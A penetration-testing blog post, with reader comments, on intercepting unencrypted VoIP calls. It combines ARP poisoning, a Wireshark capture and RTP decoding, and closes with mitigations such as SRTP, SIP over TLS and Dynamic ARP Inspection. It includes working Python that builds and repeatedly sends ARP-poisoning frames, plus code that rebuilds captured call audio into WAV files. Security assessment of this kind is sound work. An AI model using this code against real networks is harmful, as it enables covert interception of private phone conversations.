Eavesdropping VoIP Calls With Wireshark

22 Jul

VoIP phones are deployed in every major organization, and they present an attack surface to any malicious user who knows the basics of network attacks. If the media stream is not encrypted, an attacker on the same network segment can eavesdrop on phone conversations, which can have a serious business impact where calls are confidential.

A pentester should be able to determine whether eavesdropping is possible on the voice network with the following technique.

ARP Poisoning

The first step before launching a Man-in-the-Middle attack is to enable IP forwarding on the attacking host, so that the traffic it intercepts is still passed on to the gateway (and back to the phone). Without this the victim phone loses connectivity, the call simply drops, and the attack becomes obvious:

echo 1 > /proc/sys/net/ipv4/ip_forward

With forwarding enabled you can ARP-poison the phone and the gateway so that their traffic flows through your box. The command used is shown in the screenshot below; its first IP argument is the target (the phone, on the local network) and the second is the IP of the gateway.

MiTM attack

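To make the ARP poisoning step concrete, here is an added example in Python (mine, not code from the original post, which used a command-line tool shown in the screenshot). It builds the two unsolicited ARP replies a poisoning tool sends on every round, one to the phone and one to the gateway, and can transmit them on a raw socket. The interface name eth0 and every MAC and IP address in it are constructed placeholders:

```python
"""Added example (not from the original post): construct the ARP replies that an
ARP-poisoning tool sends to put the attacking host between a VoIP phone and its
gateway. All MAC and IP addresses below are constructed placeholders."""
import socket
import struct
import time

ETH_P_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying the ARP reply "sender_ip is at sender_mac",
    unicast to target_mac. The receiver updates its ARP cache although it
    never asked, which is the weakness being abused."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode=reply
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet/ARP frame so the poisoning frames can be checked."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    return {
        "opcode": struct.unpack("!H", frame[20:22])[0],
        "sender_mac": mac_str(frame[22:28]), "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def poison_frames(attacker_mac, phone_mac, phone_ip, gateway_mac, gateway_ip):
    """One poisoning round. The phone is told the gateway's IP lives at the
    attacker's MAC and the gateway is told the same about the phone's IP, so
    both directions of the call (SIP and RTP) pass through the attacker."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, phone_mac, phone_ip),
        build_arp_reply(attacker_mac, phone_ip, gateway_mac, gateway_ip),
    ]


def restore_frames(phone_mac, phone_ip, gateway_mac, gateway_ip):
    """Correct mappings to send when the test ends (arpspoof does this on exit);
    otherwise the phone stays cut off until its poisoned cache entry expires."""
    return [
        build_arp_reply(gateway_mac, gateway_ip, phone_mac, phone_ip),
        build_arp_reply(phone_mac, phone_ip, gateway_mac, gateway_ip),
    ]


def send_frames(iface, frames, rounds=0, interval=2.0):
    """Transmit on a raw Linux socket (root required). Poisoned cache entries
    age out, so the frames are resent every `interval` seconds; rounds=0 loops
    until interrupted."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP)) as s:
        s.bind((iface, 0))
        sent = 0
        while rounds == 0 or sent < rounds:
            for f in frames:
                s.send(f)
            sent += 1
            time.sleep(interval)


if __name__ == "__main__":
    ATTACKER = "02:00:00:00:00:aa"                        # constructed values
    PHONE, PHONE_IP = "02:00:00:00:00:01", "192.168.1.20"
    GW, GW_IP = "02:00:00:00:00:fe", "192.168.1.1"
    for f in poison_frames(ATTACKER, PHONE, PHONE_IP, GW, GW_IP):
        print(parse_arp(f))
    # On a lab network, after `echo 1 > /proc/sys/net/ipv4/ip_forward`:
    # send_frames("eth0", poison_frames(ATTACKER, PHONE, PHONE_IP, GW, GW_IP))
```

Running the script only prints the decoded frames; transmitting them needs root on Linux and should be done on a lab network, followed by restore_frames() so the phone recovers immediately instead of waiting for its ARP cache to time out.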

Capturing and Decoding VoIP Traffic

Now that the traffic is routed through your box you can use Wireshark to sniff the SIP signalling (display filter sip) and, more importantly, the RTP packets (display filter rtp), since these carry the actual audio of the call. Note that Wireshark only dissects a UDP stream as RTP when it has seen the SIP/SDP exchange that set the call up; if you started capturing mid-call, enable the rtp_udp heuristic dissector (Analyze > Enabled Protocols) or use Decode As on the port.

RTP Traffic



Wireshark has a built-in utility, Telephony > VoIP Calls, which lists the calls found in the capture, reassembles their RTP streams and can play them back or save them as audio, provided the codec is one Wireshark can decode (G.711 PCMU/PCMA being the common case).

Decoding RTP Traffic-Wireshark

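As an added example (not from the original post), the following Python shows what Wireshark's VoIP Calls / RTP Streams tools do before the audio becomes playable: parse the RTP header, reassemble each direction of the call by SSRC and sequence number (handling late, duplicated and wrapped sequence numbers), decode G.711 mu-law (PCMU, payload type 0) to 16-bit PCM and write a WAV file. The packets are constructed in sample_capture(); the SSRC values and payload bytes are placeholders:

```python
"""Added example (not from the original post): parse RTP, reassemble streams by
SSRC, decode G.711 mu-law (PCMU) to 16-bit PCM and write a WAV, i.e. what the
Wireshark VoIP Calls tool does before playback. Packets are constructed, not captured."""
import struct
import wave
from collections import defaultdict

PT_PCMU = 0   # G.711 mu-law: 8 kHz mono, 160 one-byte samples per 20 ms packet


def build_rtp(pt, seq, ts, ssrc, payload, marker=False):
    """Minimal RTP packet (V=2, no CSRC, extension or padding); builds test input."""
    b1 = (0x80 if marker else 0) | (pt & 0x7F)
    return struct.pack("!BBHII", 2 << 6, b1, seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc & 0xFFFFFFFF) + payload


def parse_rtp(pkt):
    """Parse the RFC 3550 fixed header, skip CSRC list and header extension, strip padding."""
    if len(pkt) < 12:
        raise ValueError("short packet")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", pkt[:12])
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    off, end = 12 + 4 * (b0 & 0x0F), len(pkt)
    if b0 & 0x10:                                   # header extension present
        if len(pkt) < off + 4:
            raise ValueError("truncated extension")
        off += 4 + 4 * struct.unpack("!H", pkt[off + 2:off + 4])[0]
    if b0 & 0x20:                                   # padding: last byte is the pad length
        pad = pkt[-1]
        if pad == 0:
            raise ValueError("bad padding")
        end -= pad
    if off > end:
        raise ValueError("truncated packet")
    return {"pt": b1 & 0x7F, "marker": bool(b1 & 0x80), "seq": seq, "ts": ts,
            "ssrc": ssrc, "payload": pkt[off:end]}


def ulaw_to_linear(u):
    """G.711 mu-law byte to signed 16-bit PCM sample (the classic Sun g711.c expansion)."""
    u = ~u & 0xFF
    t = (((u & 0x0F) << 3) + 0x84) << ((u & 0x70) >> 4)
    return (0x84 - t) if u & 0x80 else (t - 0x84)


def extended_seqs(headers):
    """Assign 32-bit extended sequence numbers (RFC 3550 A.1 style) in capture order,
    so a stream sorts correctly across the 16-bit wrap and late packets still fit."""
    cycles, max_seq = 0, headers[0]["seq"]
    for h in headers:
        seq = h["seq"]
        udelta = (seq - max_seq) & 0xFFFF
        if udelta < 0x8000:                         # in order (possibly after loss)
            if seq < max_seq:
                cycles += 0x10000                   # wrapped 65535 -> 0
            max_seq = seq
            h["ext_seq"] = cycles + seq
        else:                                       # reordered packet from before max_seq
            h["ext_seq"] = cycles + seq - (0x10000 if seq > max_seq else 0)


def reassemble(packets):
    """Group by SSRC (one per call direction), order, drop duplicates -> {ssrc: (pt, audio)}."""
    by_ssrc = defaultdict(list)
    for pkt in packets:
        h = parse_rtp(pkt)
        by_ssrc[h["ssrc"]].append(h)
    streams = {}
    for ssrc, hs in by_ssrc.items():
        extended_seqs(hs)
        seen, audio = set(), []
        for h in sorted(hs, key=lambda x: x["ext_seq"]):
            if h["ext_seq"] not in seen:            # skip retransmitted / twice-captured packets
                seen.add(h["ext_seq"])
                audio.append(h["payload"])
        streams[ssrc] = (hs[0]["pt"], b"".join(audio))
    return streams


def decode_pcmu(payload):
    return [ulaw_to_linear(b) for b in payload]


def write_wav(path, samples, rate=8000):
    with wave.open(path, "wb") as w:
        w.setparams((1, 2, rate, 0, "NONE", "not compressed"))
        w.writeframes(struct.pack(f"<{len(samples)}h", *samples))


def sample_capture():
    """Constructed capture: two SSRCs, one late packet, one duplicate, one wrap. 0xFF is silence."""
    a, b = 0x1234ABCD, 0x0BADF00D
    return [
        build_rtp(PT_PCMU, 1, 160, a, b"\x80\x00\xef\x7f" + b"\xff" * 156),
        build_rtp(PT_PCMU, 0, 0, a, b"\xff" * 160, marker=True),    # seq 0 arrives late
        build_rtp(PT_PCMU, 2, 320, a, b"\xff" * 160),
        build_rtp(PT_PCMU, 2, 320, a, b"\xff" * 160),               # duplicate
        build_rtp(PT_PCMU, 65535, 0, b, b"\xff" * 160),
        build_rtp(PT_PCMU, 0, 160, b, b"\x00" * 160),               # wrap 65535 -> 0
    ]


if __name__ == "__main__":
    for ssrc, (pt, payload) in reassemble(sample_capture()).items():
        print(f"SSRC {ssrc:08x} pt={pt} {len(payload)} samples")
        if pt == PT_PCMU:
            write_wav(f"stream_{ssrc:08x}.wav", decode_pcmu(payload))
```

Run as a script it writes one WAV per SSRC, one per direction of the call. To feed it a real capture, extract the UDP payloads of the rtp-filtered packets from the pcap (tshark -T fields -e udp.payload prints them hex-encoded) and pass the raw bytes to reassemble(). Only PCMU is decoded here; a stream in a codec Wireshark has no decoder for (G.729, for example) is listed by the VoIP Calls tool but cannot be played either.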



As shown, eavesdropping on a call takes little more than a MiTM attack and a sniffer such as Wireshark. In VoIP assessments pentesters should attempt this attack to establish whether eavesdropping is possible. To prevent it, companies should use SRTP, which encrypts and authenticates the media, so that an attacker who captures the call cannot listen to it. Two caveats apply: SRTP protects only the media, so the signalling must also be protected (SIP over TLS), otherwise the SRTP keys exchanged in the SDP are captured along with the call; and the ARP poisoning itself is best addressed on the switches (Dynamic ARP Inspection and a separate voice VLAN).


Posted by on July 22, 2014 in VoIP



2 responses to “Eavesdropping VoIP Calls With Wireshark”

  1. jamieduk

    September 20, 2016 at 2:45 pm

    The 2 IPs in the arpsnoop command: can you explain what the IPs represent? Is the 1st IP the SIP server and the 2nd IP the SIP client IP? Please reply.

    • netbiosX

      September 20, 2016 at 2:59 pm

      The first IP is the local IP and the second IP is the IP of the gateway in the network.

